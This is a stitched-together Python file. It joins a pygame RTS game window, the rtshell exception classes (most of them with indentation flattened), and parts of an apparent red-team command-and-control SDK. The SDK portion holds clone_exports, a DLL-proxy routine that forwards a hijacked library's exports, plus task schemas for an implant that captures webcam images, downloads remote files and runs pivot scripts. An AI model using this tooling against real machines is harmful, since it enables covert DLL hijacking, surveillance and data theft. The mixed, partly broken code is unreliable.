# NOTE: dataset-extraction table residue removed (was not part of the source).
from threading import Lock
import pygame
from rtsgame.src.Client.Camera import Camera
from rtsgame.src.Client.EntitySprite import EntitySprite
from rtsgame.src.Client.TextWidget import TextWidget
from rtsgame.src.Client.UI.Window import Window
from rtsgame.src.utility.constants import MOVE_UPDATE
from rtsgame.src.utility.utilities import Vector
class MainWindow(Window):
    """Top-level game window: owns the camera, entity sprites and input."""

    def __init__(self, size, sio=None):
        """Create the main window.

        :param size: viewport size forwarded to the camera.
        :param sio: socket.io client used to emit player commands
            (may be None for offline/spectator use).
        """
        super().__init__()
        self.sio = sio
        self.entities = []
        # Guards entity/camera state shared between the render thread and
        # the network callback that invokes accept_action().
        self.lock = Lock()
        self.main_camera = Camera(Vector(0, 0), size)
        self.add_child(self.main_camera, Vector(0, 0))
        self.spectate = False
        # Fire a USEREVENT every MOVE_UPDATE ms to sample the movement keys.
        pygame.time.set_timer(pygame.USEREVENT, MOVE_UPDATE)

    def accept_event(self, event):
        """Translate pygame input events into server messages."""
        if self.spectate:
            return  # spectators cannot issue commands
        if event.type == pygame.USEREVENT:
            state = pygame.key.get_pressed()
            direction = Vector(0, 0)
            if state[pygame.K_w]:
                direction += Vector(0, -1)
            if state[pygame.K_s]:
                direction += Vector(0, 1)
            if state[pygame.K_d]:
                direction += Vector(1, 0)
            if state[pygame.K_a]:
                direction += Vector(-1, 0)
            self.sio.emit('message', ("MOVE", tuple(direction)))
        elif event.type == pygame.KEYDOWN and event.key == pygame.K_f:
            self.sio.emit('message', "ATTACK")

    def enable_spectate(self):
        """Switch to spectator mode and show an on-screen label."""
        spectate_text = TextWidget('Spectating')
        self.main_camera.add_child(spectate_text, Vector(0, 900))
        self.spectate = True

    def accept_action(self, action):
        """Apply a server update: either an entity list or 'SPECTATE'.

        :param action: list received from the server; first element may be
            the literal 'SPECTATE', otherwise each element describes an
            entity (format defined by EntitySprite).
        :raises RuntimeError: if ``action`` is not a list.
        """
        if not isinstance(action, list):
            raise RuntimeError(
                "Action is not of type list. Don't know what to do with it")
        if not action:
            return  # empty update: nothing to do (previously an IndexError)
        if action[0] == 'SPECTATE':
            self.enable_spectate()
        else:
            # Build the sprites outside the lock, then publish the new
            # entity list and camera state atomically (the old code wrote
            # self.entities before acquiring the lock).
            entities = [EntitySprite(info) for info in action]
            with self.lock:
                self.entities = entities
                self.main_camera.set_hp(entities[0].health)
                self.main_camera.set_center(entities[0].position)
                self.main_camera.set_sprites(entities)
import rtctree.path
class RtShellError(Exception):
    """Root of the rtshell exception hierarchy; all errors derive from it."""
    pass
class CallFailedError(RtShellError):
    '''An interface call failed.

    Now derives from RtShellError (it previously subclassed Exception
    directly), so generic ``except RtShellError`` handlers catch it as the
    base class's "base error for all errors" contract promises. It remains
    an Exception subclass, so existing handlers are unaffected.
    '''
    def __init__(self, msg):
        self._msg = msg

    def __str__(self):
        return 'Interface call failed: {0}'.format(self._msg)
class RequiredActionFailedError(RtShellError):
'''Error raised when an action that must succeed fails.'''
def __init__(self, msg):
self._msg = msg
def __str__(self):
return 'Required action failed: {0}'.format(self._msg)
class PrecedingTimeoutError(RtShellError):
'''The time limit on a preceding condition being met has elapsed.'''
def __init__(self, msg):
self._msg = msg
def __str__(self):
return 'Preceding condition timed out: {0}'.format(self._msg)
class PlanExecutionError(RtShellError):
'''An error occurred executing a plan.'''
def __init__(self, error):
self._error = error
def __str__(self):
return 'Error executing plan:\n{0}'.format(self._error)
class EmptyConstExprError(RtShellError):
    '''A constant expression that should be evaluated is empty.'''
    def __str__(self):
        # The old message carried a stray trailing space; dropped.
        return 'Empty constant expression'
class AmbiguousTypeError(RtShellError):
'''A data type is ambiguous.'''
def __init__(self, type):
self._type = type
def __str__(self):
return 'Ambiguous port type: {0}'.format(self._type)
class TypeNotFoundError(RtShellError):
'''A data type was not found.'''
def __init__(self, type):
self._type = type
def __str__(self):
return 'Type not found: {0}'.format(self._type)
class BadPortSpecError(RtShellError):
'''A port specification is badly formatted.'''
def __init__(self, ps):
self._ps = ps
def __str__(self):
return 'Bad port specification: {0}'.format(self._ps)
class SameNameDiffSpecError(RtShellError):
'''A port spec has a different property from another with the same name.'''
def __init__(self, ps):
self._ps = ps
def __str__(self):
return 'Port specification with same name has different properties: '\
'{0}'.format(self._ps)
class NoSuchObjectError(RtShellError):
'''The given path does not point to the necessary object.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'No such object: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'No such object: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'No such object: {0}'.format(self._path)
class NotAComponentOrManagerError(RtShellError):
'''A given path is not a component nor a manager.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Not a component or manager: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Not a component or manager: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Not a component or manager: {0}'.format(self._path)
class NotAComponentError(RtShellError):
'''A given path is not a component.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Not a component: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Not a component: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Not a component: {0}'.format(self._path)
class NotACompositeComponentError(RtShellError):
'''A given path is not a composite component.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Not a composite component: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Not a composite component: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Not a composite component: {0}'.format(self._path)
class NotAPortError(RtShellError):
'''A given path is not a port.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Not a port: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Not a port: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Not a port: {0}'.format(self._path)
class ParentNotADirectoryError(RtShellError):
'''A given path's parent is not a directory.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Parent not a directory: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Parent not a directory: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Parent not a directory: {0}'.format(self._path)
class NotADirectoryError(RtShellError):
'''A given path is not a directory.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Not a directory: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Not a directory: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Not a directory: {0}'.format(self._path)
class NotAPortError(RtShellError):
    '''A given path is not a port.'''
    # NOTE(review): this class is an exact duplicate of the NotAPortError
    # defined earlier in this module; this second definition silently
    # rebinds the name to an identical class. Consider deleting one copy.
    def __init__(self, path):
        self._path = path
    def __str__(self):
        if type(self._path) == tuple:
            return 'Not a port: {0}'.format(
                rtctree.path.format_path(self._path))
        elif type(self._path) == list:
            return 'Not a port: {0}'.format(
                rtctree.path.format_path((self._path, None)))
        else:
            return 'Not a port: {0}'.format(self._path)
class NotAManagerError(RtShellError):
'''A given path is not a manager.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Not a manager: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Not a manager: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Not a manager: {0}'.format(self._path)
class NotInManagerError(RtShellError):
'''A component name does not exist in a manager.'''
def __init__(self, name):
self._name = name
def __str__(self):
return '{0} is not in the manager.'.format(self._name)
class UndeletableObjectError(RtShellError):
'''Some objects cannot be deleted.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Undeletable object: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Undeletable object: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Undeletable object: {0}'.format(self._path)
class NotZombieObjectError(RtShellError):
'''A given path does not point to a zombie.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Not a zombie object: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Not a zombie object: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Not a zombie object: {0}'.format(self._path)
class ZombieObjectError(RtShellError):
'''A given path points to a zombie.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Zombie object: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Zombie object: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Zombie object: {0}'.format(self._path)
class UnknownObjectError(RtShellError):
'''A given path points to an unknown object.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Unknown object: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Unknown object: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Unknown object: {0}'.format(self._path)
class NoDestPortError(RtShellError):
'''A required destination port was not specified.'''
def __str__(self):
return 'No destination port specified.'
class NoSourcePortError(RtShellError):
'''A required source port was not specified.'''
def __str__(self):
return 'No source port specified.'
class CannotDoToPortError(RtShellError):
'''The action cannot be performed on a port.'''
def __init__(self, action):
self._action = action
def __str__(self):
return 'Cannot {0} ports.'.format(self._action)
class PortNotFoundError(RtShellError):
'''The port was not found on the component.'''
def __init__(self, rtc, port):
self._rtc = rtc
self._port = port
def __str__(self):
return 'Port not found: {0}'.format(
rtctree.path.format_path((self._rtc, self._port)))
class ConnectionNotFoundError(RtShellError):
'''A connection between two ports was not found.'''
def __init__(self, path1, path2):
self._path1 = path1
self._path2 = path2
def __str__(self):
if type(self._path1) == tuple:
path1_str = rtctree.path.format_path(self._path1)
elif type(self._path1) == list:
path1_str = rtctree.path.format_path((self._path1, None))
else:
path1_str = self._path1
if type(self._path2) == tuple:
path2_str = rtctree.path.format_path(self._path2)
elif type(self._path2) == list:
path2_str = rtctree.path.format_path((self._path2, None))
else:
path2_str = self._path2
return 'No connection from {0} to {1}'.format(path1_str, path2_str)
class MultiConnectionNotFoundError(RtShellError):
    '''A connection between ports was not found.'''
    def __str__(self):
        # The original literal ended with three quotes ("...ports.'''"),
        # silently concatenating an empty string; same text, single literal.
        return 'No connection found involving the specified ports.'
class ConnectionIDNotFoundError(RtShellError):
'''The port was not found on the component.'''
def __init__(self, id, path):
self._id = id
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'No connection from {0} with ID {1}'.format(
rtctree.path.format_path(self._path), self._id)
elif type(self._path) == list:
return 'No connection from {0} with ID {1}'.format(
rtctree.path.format_path((self._path, None)), self._id)
else:
return 'No connection from {0} with ID {1}'.format(self._path,
self._id)
class DuplicateConnectionError(RtShellError):
'''An identical connection already exists.'''
def __init__(self, ports):
self._ports = ports
def __str__(self):
return 'An identical connection already exists between ports {}'.format(
self._ports)
class DuplicateConnectionIDError(RtShellError):
'''A connection with that ID already exists.'''
def __init__(self, conn_id):
self._conn_id = conn_id
def __str__(self):
return 'A connection with ID {} already exists between the ' \
'specified ports'.format(self._conn_id)
class DuplicateConnectionNameError(RtShellError):
'''A connection with that name already exists.'''
def __init__(self, conn_name, port_name):
self._conn_name = conn_name
self._port_name = port_name
def __str__(self):
return 'A connection with name {} already exists from the ' \
'specified port {}'.format(self._conn_name, self._port_name)
class BadPortTypeError(RtShellError):
'''The port type is not defined.'''
def __init__(self, rtc, port):
self._rtc = rtc
self._port = port
def __str__(self):
return 'Incorrect port type: {0}'.format(
rtctree.path.format_path((self._rtc, self._port)))
class MissingCompError(RtShellError):
'''An expected component is missing.'''
def __init__(self, path):
self._path = path
def __str__(self):
return 'Expected component missing: {0}'.format(self._path)
class ConnectFailedError(RtShellError):
'''An error occured connecting two ports.'''
def __init__(self, rtc, port):
self._rtc = rtc
self._port = port
def __str__(self):
return 'Failed to connect port: {0}'.format(
rtctree.path.format_path((self._rtc, self._port)))
class ActivateError(RtShellError):
'''An error occured activating a component.'''
def __init__(self, comp):
self._comp = comp
def __str__(self):
return 'Error activating component: {0}'.format(self._comp)
class DeactivateError(RtShellError):
'''An error occured deactivating a component.'''
def __init__(self, comp):
self._comp = comp
def __str__(self):
return 'Error deactivating component: {0}'.format(self._comp)
class PortNotInputError(RtShellError):
'''A port is not an input that should be.'''
def __init__(self, name):
self._name = name
def __str__(self):
return 'Port is not input: {0}'.format(self._name)
class PortNotOutputError(RtShellError):
'''A port is not an output that should be.'''
def __init__(self, name):
self._name = name
def __str__(self):
return 'Port is not output: {0}'.format(self._name)
class ImportFormatterError(RtShellError):
'''An error occured importing a formatting function.'''
def __init__(self, exc):
self._exc = exc
def __str__(self):
return 'Error importing formatter: {0}'.format(self._exc)
class BadFormatterError(RtShellError):
'''The imported formatter is bad (most likely not a function).'''
def __init__(self, fun):
self._fun = fun
def __str__(self):
return 'Bad formatter: {0}'.format(self._fun)
class MissingPOAError(RtShellError):
'''A data type from a module was used without a matching POA loaded.'''
def __init__(self, mod):
self._mod = mod
def __str__(self):
return 'Missing POA module: {0}'.format(self._mod)
class NoConfSetError(RtShellError):
'''The specified configuration set does not exist.'''
def __init__(self, name):
self._name = name
def __str__(self):
return 'No such configuration set: {0}'.format(self._name)
class BadStartPointError(RtShellError):
'''A given start point for the log is outside the bounds.'''
def __str__(self):
return 'Start time/index out of bounds.'
class BadEndPointError(RtShellError):
'''A given end point for the log is outside the bounds.'''
def __str__(self):
return 'End time/index out of bounds.'
class BadLogTypeError(RtShellError):
'''An invalid logger type was chosen.'''
def __init__(self, type):
self._type = type
def __str__(self):
return 'Invalid logger type: {0}'.format(self._type)
class UnsupportedLogTypeError(RtShellError):
'''The selected log type doesn't support the desired feature.'''
def __init__(self, type, feature):
self._type = type
self._feature = feature
def __str__(self):
return 'Log type "{0}" does not support feature {1}.'.format(
self._type, self._feature)
class NoLogFileNameError(RtShellError):
'''An expected file name was not provided.'''
def __str__(self):
return 'No log file specified.'
class BadMgrAddressError(RtShellError):
'''A bad corbaloc address was given.'''
def __str__(self):
return 'Invalid corbaloc URL.'
class FailedToNarrowError(RtShellError):
'''Failed to narrow a CORBA object reference.'''
def __str__(self):
return 'Failed to narrow CORBA object reference.'
class CannotRemoveFromNewCompositionError(RtShellError):
'''Cannot remove components/ports from a new composition.'''
def __str__(self):
return 'Cannot remove components/ports from a new composition.'
# vim: tw=79
import copy
import re
import struct
from typing import Any, Dict, List, Union
import pefile
from rtt_sdk.models import Architecture, FileOrDirectory, Process, TaskDelivery, TaskStatus
# Read_Only | Initialized_Data
DEFAULT_CHARACTERISTICS = 0x40000040
SECTION_NAME = 8
MACHINE_IA64 = 512
MACHINE_AMD64 = 34404
def _align_up(value: int, align: int = 0x1000) -> int:
return (value + align - 1) & ~(align - 1)
def _is_64bit_dll(data: bytes) -> bool:
header_offset = struct.unpack("<L", data[60:64])[0]
machine = struct.unpack("<H", data[header_offset + 4 : header_offset + 4 + 2])[0]
if machine == MACHINE_IA64 or machine == MACHINE_AMD64:
return True
return False
def _add_section(pe: pefile.PE, name: str, size: int, characteristics: int = DEFAULT_CHARACTERISTICS):
    """Append a new section (header + zero-filled data) to a parsed PE.

    :param pe: parsed PE image to extend.
    :param name: section name, at most SECTION_NAME (8) bytes once encoded.
    :param size: requested section size in bytes; aligned up internally.
    :param characteristics: section flag bits (default: read-only
        initialized data).
    :returns: ``(pe, section)`` — a freshly re-parsed PE (the input object
        is not the one returned) and the new section header structure.
    :raises ValueError: if the name is too long or the header table has no
        room for another IMAGE_SECTION_HEADER.
    """
    # Sanity checks
    if len(name) > SECTION_NAME:
        raise ValueError("Section name is too long")
    section_header_size = pefile.Structure(pefile.PE.__IMAGE_SECTION_HEADER_format__).sizeof()
    # New header slot sits immediately after the last existing header.
    section_header_off = pe.sections[-1].get_file_offset() + section_header_size
    if section_header_off + section_header_size > pe.OPTIONAL_HEADER.SizeOfHeaders: # type: ignore
        raise ValueError("Not enough room for another SECTION_HEADER")
    # Calculate/Align sizes
    virtual_size = _align_up(size, pe.OPTIONAL_HEADER.SectionAlignment) # type: ignore
    virtual_addr = _align_up(
        pe.sections[-1].VirtualAddress + pe.sections[-1].Misc_VirtualSize,
        pe.OPTIONAL_HEADER.SectionAlignment, # type: ignore
    )
    raw_size = _align_up(size, pe.OPTIONAL_HEADER.FileAlignment) # type: ignore
    raw_ptr = _align_up(
        pe.sections[-1].PointerToRawData + pe.sections[-1].SizeOfRawData,
        pe.OPTIONAL_HEADER.FileAlignment, # type: ignore
    )
    # Configure section properties
    section = pefile.SectionStructure(pe.__IMAGE_SECTION_HEADER_format__, pe=pe)
    section.set_file_offset(section_header_off)
    # Name must be exactly 8 bytes, null-padded.
    section.Name = name.encode().ljust(SECTION_NAME, b"\x00")
    section.VirtualAddress = virtual_addr
    section.PointerToRawData = raw_ptr
    section.Misc = section.Misc_VirtualSize = virtual_size
    section.SizeOfRawData = raw_size
    section.Characteristics = characteristics
    section.PointerToRelocations = 0
    section.NumberOfRelocations = 0
    section.NumberOfLinenumbers = 0
    section.PointerToLinenumbers = 0
    # Correct headers
    pe.FILE_HEADER.NumberOfSections += 1 # type: ignore
    # NOTE(review): assumes the new section is the image's last; SizeOfImage
    # is recomputed from it rather than extended.
    pe.OPTIONAL_HEADER.SizeOfImage = virtual_addr + virtual_size # type: ignore
    # Add buffer padding
    pe.__data__ += b"\x00" * raw_size
    # Append to ensure overwrite
    pe.__structures__.append(section)
    # Recreate to save our changes
    pe = pefile.PE(data=pe.write())
    return pe, section
def _clone_exports(tgt: pefile.PE, ref: pefile.PE, ref_path: str, new_section_name: str = ".rdata2"):
    """Copy *ref*'s export directory into *tgt*, rewriting every export as a
    forwarder string pointing back at *ref_path* (DLL-proxy technique).

    Neither input PE is mutated (both are deep-copied). Returns a re-parsed
    target PE whose export data directory points at the new section.

    :raises ValueError: if the reference binary exports nothing, or the new
        section cannot be added (via _add_section).
    """
    # Forwards typically don't supply the extension
    ref_path = ref_path.replace(".dll", "")
    ref = copy.deepcopy(ref)
    tgt = copy.deepcopy(tgt)
    # DATA_DIRECTORY[0] is the export table.
    ref_export_dir = ref.OPTIONAL_HEADER.DATA_DIRECTORY[0] # type: ignore
    if not ref_export_dir.Size:
        raise ValueError("Reference binary has no exports")
    # Forwarder strings: "path.Name" for named exports, "path.#N" for
    # ordinal-only exports, in ordinal order.
    exp_names = [
        ref_path.encode() + b"." + e.name if e.name else ref_path.encode() + b".#" + str(e.ordinal).encode()
        for e in sorted(ref.DIRECTORY_ENTRY_EXPORT.symbols, key=lambda x: x.ordinal) # type: ignore
    ]
    exp_names_blob = b"\x00".join(exp_names) + b"\x00"
    # Section holds the copied directory data followed by the forwarders.
    new_section_size = ref_export_dir.Size + len(exp_names_blob)
    tgt, section = _add_section(tgt, new_section_name, new_section_size)
    final_rva = section.VirtualAddress # type: ignore
    # Capture the reference export directory
    export_dir = ref.__unpack_data__(
        pefile.PE.__IMAGE_EXPORT_DIRECTORY_format__,
        ref.get_data(
            ref_export_dir.VirtualAddress, pefile.Structure(pefile.PE.__IMAGE_EXPORT_DIRECTORY_format__).sizeof()
        ),
        file_offset=0, # we don't need this
    )
    # Calculate our delta
    delta = final_rva - ref_export_dir.VirtualAddress
    # Apply RVA delta to export names
    for i in range(export_dir.NumberOfNames): # type: ignore
        ref.set_dword_at_rva(
            export_dir.AddressOfNames + 4 * i, # type: ignore
            ref.get_dword_at_rva(export_dir.AddressOfNames + 4 * i) + delta, # type: ignore
        )
    # Link function addresses to forward names
    # (forwarders are laid out right after the copied directory data).
    forward_offset = ref_export_dir.VirtualAddress + ref_export_dir.Size + delta
    true_offset = 0
    for i in range(export_dir.NumberOfFunctions): # type: ignore
        if not ref.get_dword_at_rva(export_dir.AddressOfFunctions + 4 * i): # type: ignore
            continue # This function is hollow (never used)
        forward_name = exp_names[true_offset]
        ref.set_dword_at_rva(export_dir.AddressOfFunctions + 4 * i, forward_offset) # type: ignore
        forward_offset += len(forward_name) + 1 # +1 for null byte
        true_offset += 1
    # Apply RVA delta to directory
    export_dir.AddressOfFunctions += delta # type: ignore
    export_dir.AddressOfNames += delta # type: ignore
    export_dir.AddressOfNameOrdinals += delta # type: ignore
    # Write in our new export directory: first the copied data + forwarder
    # blob, then the patched directory header over the start of it.
    # NOTE(review): assumes the IMAGE_EXPORT_DIRECTORY sits at the very start
    # of the export data directory — TODO confirm for unusual layouts.
    tgt.set_bytes_at_rva(final_rva, ref.get_data(ref_export_dir.VirtualAddress, ref_export_dir.Size) + exp_names_blob)
    tgt.set_bytes_at_rva(final_rva, export_dir.__pack__())
    # Rebuild from bytes to save back
    tgt = pefile.PE(data=tgt.__data__)
    # Update directory specs
    tgt_export_dir = tgt.OPTIONAL_HEADER.DATA_DIRECTORY[0] # type: ignore
    tgt_export_dir.VirtualAddress = section.VirtualAddress # type: ignore
    tgt_export_dir.Size = new_section_size
    tgt = pefile.PE(data=tgt.write())
    return tgt
def recurse_encode_bytes(d: Any, encoding: str = "utf-8"):
    """Recursively decode ``bytes`` values inside nested dicts and lists.

    :param d: arbitrary value; dicts and lists are walked recursively and
        rebuilt, any other value is returned unchanged (including a bare
        top-level ``bytes``, which is only decoded when nested).
    :param encoding: text encoding used by ``bytes.decode``.
    :returns: a new structure with every nested ``bytes`` leaf decoded.
    """
    # Bug fix: the encoding is now propagated to recursive calls; previously
    # nested containers always decoded their bytes as UTF-8.
    if isinstance(d, dict):
        out = {}
        for key, value in d.items():
            if isinstance(value, (dict, list)):
                value = recurse_encode_bytes(value, encoding)
            elif isinstance(value, bytes):
                value = value.decode(encoding)
            out[key] = value
        return out
    elif isinstance(d, list):
        out = []
        for value in d:
            if isinstance(value, (dict, list)):
                value = recurse_encode_bytes(value, encoding)
            elif isinstance(value, bytes):
                value = value.decode(encoding)
            out.append(value)
        return out
    return d
def clone_exports(tgt_bytes: bytes, ref_bytes: bytes, ref_path: str, new_section_name: str = ".rdata2") -> bytes:
    """
    Clone the export table from one (reference) DLL onto another (target) DLL.

    Exported functionality is proxied back to the reference via export
    forwarding.

    :param bytes tgt_bytes: Target PE bytes for cloning
    :param bytes ref_bytes: Reference PE bytes to clone from
    :param str ref_path: Path of the reference library during the hijack
    :param str new_section_name: PE section name if a new section is required (Default = '.rdata2')
    :returns: Updated PE bytes
    :rtype: bytes
    """
    target = pefile.PE(data=tgt_bytes)
    reference = pefile.PE(data=ref_bytes)
    cloned = _clone_exports(target, reference, ref_path, new_section_name)
    return cloned.write() or b""
def convert_path_for_architecture(arch: Architecture, path: str) -> str:
    """Rewrite architecture markers in *path* so it matches *arch*.

    Handles .NET ``\\Framework\\`` / ``\\Framework64\\`` directory segments;
    otherwise swaps literal ``x86`` / ``x64`` fragments for ``arch.value``.

    :raises ValueError: if a Framework segment is present but *arch* is
        neither x86 nor x64.
    """
    framework_hits = re.findall(r"\\([fF]ramework(?:64)?)\\", path)
    if not framework_hits:
        return path.replace("x86", arch.value).replace("x64", arch.value)
    if arch == Architecture.x64:
        replacement = "Framework64"
    elif arch == Architecture.x86:
        replacement = "Framework"
    else:
        raise ValueError("Could not convert path")
    return path.replace(framework_hits[0], replacement)
def invert_architecture(arch: Architecture):
    """Return the opposite architecture (x86 <-> x64).

    :raises ValueError: for any other value.
    """
    if arch == Architecture.x86:
        return Architecture.x64
    if arch == Architecture.x64:
        return Architecture.x86
    raise ValueError("Could not invert architecture")
def architecture_from_directory(directory: Union[str, Dict[str, Any], List[str], List[FileOrDirectory]]):
    """
    Derive architecture from a directory listing (usually C:\\)
    """
    # Normalize the input into something the membership tests below accept.
    if isinstance(directory, dict):
        names = list(directory.keys())
    elif all(isinstance(entry, FileOrDirectory) for entry in directory):
        names = [entry.name for entry in directory]  # type: ignore
    else:
        names = directory
    # 64-bit Windows always carries the WOW64 "Program Files (x86)" folder.
    if "Program Files (x86)" in names:
        return Architecture.x64
    if "Program Files" in names:
        return Architecture.x86
    raise ValueError("Dir does not look like a root directory listing")
def architecture_from_process_list(ps: Union[str, List[Process]]):
    """
    Derive architecture from a process listing
    """
    if isinstance(ps, str):
        # Raw text listing: look for an architecture column token.
        if " x64 " in ps:
            return Architecture.x64
        if " x86 " in ps:
            return Architecture.x86
    else:
        # Structured listing: x64 wins if any process reports it.
        if any(proc.arch == Architecture.x64 for proc in ps):
            return Architecture.x64
        if any(proc.arch == Architecture.x86 for proc in ps):
            return Architecture.x86
    raise ValueError("ps does not look like a process list")
def architecture_from_pe_bytes(pe_bytes: bytes):
    """
    Derive architecture from PE file bytes
    """
    # Every PE starts with the DOS 'MZ' magic.
    if not pe_bytes.startswith(b"MZ"):
        raise ValueError("File does not look like a PE")
    if _is_64bit_dll(pe_bytes):
        return Architecture.x64
    return Architecture.x86
def architecture_from_pe_path(pe_path: str):
    """
    Derive architecture from a local PE file

    :param pe_path: path to a PE file on disk.
    """
    # Use a context manager so the handle is closed promptly; the previous
    # version leaked the file object returned by open().
    with open(pe_path, "rb") as pe_file:
        return architecture_from_pe_bytes(pe_file.read())
def is_task_finished(delivery: TaskDelivery) -> bool:
    """Return True once a task delivery has reached a terminal state."""
    terminal_states = (TaskDelivery.completed, TaskDelivery.blocked, TaskDelivery.invalid)
    return delivery in terminal_states
def is_task_failed(status: TaskStatus) -> bool:
    """Return True when *status* represents any failure severity."""
    return status in [TaskStatus.failure, TaskStatus.warning, TaskStatus.critical]
from __future__ import annotations
from datetime import datetime
from enum import Enum
from typing import Any, Dict, List, Optional
from uuid import UUID
from pydantic import Field
from .schema import Schema
class AccessToken(Schema):
access_token: str = Field(..., title="Access Token")
token_type: str = Field(..., title="Token Type")
class ApiConfig(Schema):
api_version: str = Field(..., alias="apiVersion", title="Apiversion")
app_version: str = Field(..., alias="appVersion", title="Appversion")
env: str = Field(..., title="Env")
storage_url: str = Field(..., alias="storageUrl", title="Storageurl")
class Architecture(str, Enum):
    # Process/OS architecture identifier used throughout the task models.
    x86 = "x86"
    x64 = "x64"
class BlobReferenceRoot(Schema):
id: Optional[str] = Field(None, description="Blob identifier", title="Id")
name: Optional[str] = Field(None, description="Contextual name", title="Name")
data: Optional[bytes] = Field(None, description="Raw data", title="Data")
class BodyCreateBlobApiBlobsPost(Schema):
data: bytes = Field(..., title="Data")
class BodyLoginApiAuthTokenPost(Schema):
grant_type: Optional[str] = Field(None, regex="password", title="Grant Type")
username: str = Field(..., title="Username")
password: str = Field(..., title="Password")
scope: Optional[str] = Field("", title="Scope")
client_id: Optional[str] = Field(None, title="Client Id")
client_secret: Optional[str] = Field(None, title="Client Secret")
class Camera(Schema):
id: int = Field(..., description="Camera ID", example=1, title="Id")
name: Optional[str] = Field(None, description="Camera Name", example="Logitech C120", title="Name")
class CameraCaptureArguments(Schema):
camera_id: int = Field(
...,
alias="cameraId",
description="Target camera ID",
example=1,
title="Cameraid",
)
quality: Optional[int] = Field(
25,
description="Capture quality level",
example=25,
ge=1.0,
le=99.0,
title="Quality",
)
class CameraListArguments(Schema):
pass
class ClientScriptArguments(Schema):
name: str = Field(..., description="Script name", example="pivot.py", title="Name")
arguments: Optional[str] = Field(
"",
description="Script arguments",
example="--host MACHINE-A",
title="Arguments",
)
class ClientScriptToken(Schema):
access_token: str = Field(..., title="Access Token")
token_type: str = Field(..., title="Token Type")
task_id: UUID = Field(..., title="Task Id")
class ContentHint(str, Enum):
text = "text"
image = "image"
class ContextIdleArguments(Schema):
pass
class ContextProcessArguments(Schema):
pass
class ContextUserArguments(Schema):
verbose: Optional[bool] = Field(
False,
description="Provide verbose information about the current token",
example=False,
title="Verbose",
)
class DiscoveredInstance(Schema):
path: str = Field(..., description="Path of discovery", example="mypipe1", title="Path")
tag: str = Field(..., description="Instance tag", example="jPc4dpYI", title="Tag")
class DotNetFrameworkVersion(str, Enum):
field_2 = "2"
field_4 = "4"
unknown = "unknown"
class ExitArguments(Schema):
pass
class FileChangeDirectoryArguments(Schema):
directory: Optional[str] = Field(
"",
description="New directory (leave empty/ommit to retrieve current)",
example="C:\\Windows",
title="Directory",
)
class FileCopyArguments(Schema):
source: str = Field(
...,
description="Remote source file path (supports environment variables)",
example="C:\\source.ext",
title="Source",
)
destination: str = Field(
...,
description="Remote destination file path (supports environment variables)",
example="%WINDIR%\\destination.ext",
title="Destination",
)
force: Optional[bool] = Field(
False,
description="Overwrite the target file if needed",
example=False,
title="Force",
)
class FileDownloadArguments(Schema):
path: str = Field(
...,
description="Remote file path (supports environment variables)",
example="C:\\Windows\\win.ini",
title="Path",
)
print: Optional[bool] = Field(
False,
description="Request to print the results directly when possible",
title="Print",
)
class FileMakeDirectoryArguments(Schema):
path: str = Field(
...,
description="Remote directory path (supports environment variables)",
example="C:\\temporary",
title="Path",
)
class FileMoveArguments(Schema):
source: str = Field(
...,
description="Remote source file path (supports environment variables)",
example="C:\\source.ext",
title="Source",
)
destination: str = Field(
...,
description="Remote destination file path (supports environment variables)",
example="%WINDIR%\\destination.ext",
title="Destination",
)
force: Optional[bool] = Field(
False,
description="Overwrite the target file if needed",
example=False,
title="Force",
)
class FileOrDirectory(Schema):
    # One entry of a remote directory listing.
    name: str = Field(..., description="File/Directory name", example="win.ini", title="Name")
    # True when the entry is a directory (in which case `size` is typically absent).
    is_dir: Optional[bool] = Field(
        False,
        alias="isDir",
        description="Object is a directory",
        example=False,
        title="Isdir",
    )
    time: datetime = Field(
        ...,
        description="Last queried time metric (access, create, write)",
        example="2000-01-02T03:04:05",
        title="Time",
    )
    size: Optional[int] = Field(None, description="File size in bytes ", example=1423, title="Size")
class FileRemoveArguments(Schema):
path: str = Field(
...,
